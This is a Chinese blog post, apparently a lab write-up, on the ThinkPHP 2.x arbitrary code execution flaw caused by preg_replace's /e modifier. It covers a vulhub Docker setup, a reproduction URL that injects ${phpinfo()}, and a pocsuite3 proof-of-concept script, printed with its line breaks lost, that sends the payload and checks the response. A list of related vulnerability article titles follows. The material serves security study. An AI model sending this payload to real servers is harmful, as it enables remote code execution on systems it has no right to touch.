thinkphp 2.x 任意代码执行
thinkphp 2.x任意代码执行
1.漏洞概述
ThinkPHP 2.x版本中,使用preg_replace
的/e
模式匹配路由:
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。
ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。
2.环境搭建
在/vulhub/thinkphp/2-rce下执行docker-compose up -d
环境启动后,访问http://192.168.1.142:8080/index.php
查看默认页面
3.漏洞复现
直接访问http://192.168.1.142:8080/index.php?s=/index/index/name/${phpinfo()}
即可执行phpinfo()
POC
from pocsuite3.api import Output, POCBase,register_poc,requests,logger
from pocsuite3.api import get_listener_ip,get_listener_port
from pocsuite3.api import REVERSE_PAYLOADclass DemoPOC(POCBase):vulID = ''version = '1'author = 'wcs'vulDate = '2022-04-16'createDate = '2022-04-16'updateDate = '2022-04-16'references = []name = 'thinkphp 2-rce 任意代码执行漏洞'appPowerLink = ''appName = ''appVersion = ''vulType = '任意代码执行'desc = '''练习pocsuite '''samples = []install_requires = []def _verify(self):output = Output(self)result = {} # 验证代码payload = "/index.php?s=/index/index/name/${phpinfo()}"url = self.urltry:resq = requests.get(url+payload)if resq and resq.status_code == 200 and "PHP Version" in resq.text:result['VerifyInfo'] = {}result['VerifyInfo']['URL'] = urlresult['VerifyInfo']['Name'] = payloadexcept Exception as e:passif result:output.success(result)else:output.fail('target is not vulnerable')return outputdef _attack(self):return self._verify()
register_poc(DemoPOC)
这个POC主要是自己练习使用pocsuite,就利用了现成的靶场,验证代码也比较简单
thinkphp 2.x 任意代码执行相关推荐
- ThinkPHP 2.x 任意代码执行漏洞
漏洞简介 ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@ ...
- thinkphp日志泄漏漏洞_ThinkPHP框架任意代码执行漏洞的利用及其修复方法
ThinkPHP是国内著名的开源的PHP框架,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的.最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循Apache2 ...
- layuiajax提交表单控制层代码_漏洞预警|ThinkPHP 5.0 远程代码执行
漏洞预警|ThinkPHP 5.0 远程代码执行 2019-01-11 事件来源 2019年1月11日,ThinkPHP Github仓库发布了新的版本v5.0.24,包含重要的安全更新,山石安服团队 ...
- 74cms 任意代码执行(CVE-2020-35339)
74cms 任意代码执行(CVE-2020-35339) 0x01 漏洞简介 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统.由太原迅易科技有限公司于2009年 ...
- Android Adobe Reader 任意代码执行分析(附POC)
livers · 2014/04/18 14:05 0x00 描述 前几天老外在fd还有exploit-db上,公布了Adobe Reader任意代码执行的漏洞. 漏洞编号: CVE: 2014-05 ...
- ecshop 2.x/3.x sql注入/任意代码执行漏洞
影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的"二次漏洞",通过user.php文件中di ...
- nginx php 配置请求等待时间_CVE-2019-11043: PHP-FPM在Nginx特定配置下任意代码执行漏洞预警...
0x01 前言 2019年10月23日,PHP官方发布了在 nginx 配置不当的情况下 php-fpm 可导致远程代码执行的漏洞. 但由于是配置文件的开放性,还请使用 nginx+php-fpm 的 ...
- HP officejet、PageWide打印机任意代码执行漏洞cve-2017-2741 Tenable发布漏洞检测插件...
打印机无处不在.在企业,在家里,在学校,但你在做网络安全评估的时候是否考虑过他们?你上一次更新打印机固件是什么时候?您是否知道您的打印机有公共漏洞?Tenable安全公司进行了研究,并发布了漏洞检测 ...
- php 168任意代码执行漏洞之php的Complex (curly) syntax
今天了解了php 168的任意代码执行漏洞,Poc: http://192.168.6.128/pentest/cms/php168/member/post.php ?only=1 &show ...
- php调用python pkl_Python Pickle的任意代码执行漏洞实践和Payload构造
*原创作者:bit4@勾陈安全实验室,MottoIN原创文章未经许可禁止转载 0x01 Pickle的典型应用场景 一般在什么场景下需要用到Pickle?通常在解析认证token,session的时候 ...
最新文章
- 动态规划中的多段图问题
- 2018提高组训练Day2
- 为什么Intel Realsense D435深度摄像头在基于深度的水平方向障碍物检测(避障)方案中,摄像头不宜安装太高?
- java中集合的结构(list和map)
- SQL server数据异地备份到OSS
- 基于FPGA的红外遥控解码与PC串口通信
- Bailian2722 学分绩点【序列处理】
- 计算机的显卡控制面板在哪里,nvidia控制面板在哪里打开
- 分享个短视频竞品分析报告
- mac下使用php cURL方法nginx502错误
- EVO工具在EUROC数据集TUM数据集,评测ORB-SLAM3和VINS-MONO
- clk_get、clk_enable和clk_get_rate函数
- APPNP:PREDICT THEN PROPAGATE: GRAPH NEURAL NETWORKS MEET PERSONALIZED PAGERANK
- linux下at24c02驱动程序,Linux下iic(i2c)读写AT24C02
- [Android自定义控件]双圆圈内外旋转菜单
- maven dependency的作用英文解释(转载)
- P1395 会议 题解
- Oracle增加修改删除字段
- 安徽科技学院 信网学院网络文化节 胡鑫
- [野狐行][辅助开发系列课程][2016/4/27][一重门公开课全集][官方网站已开放]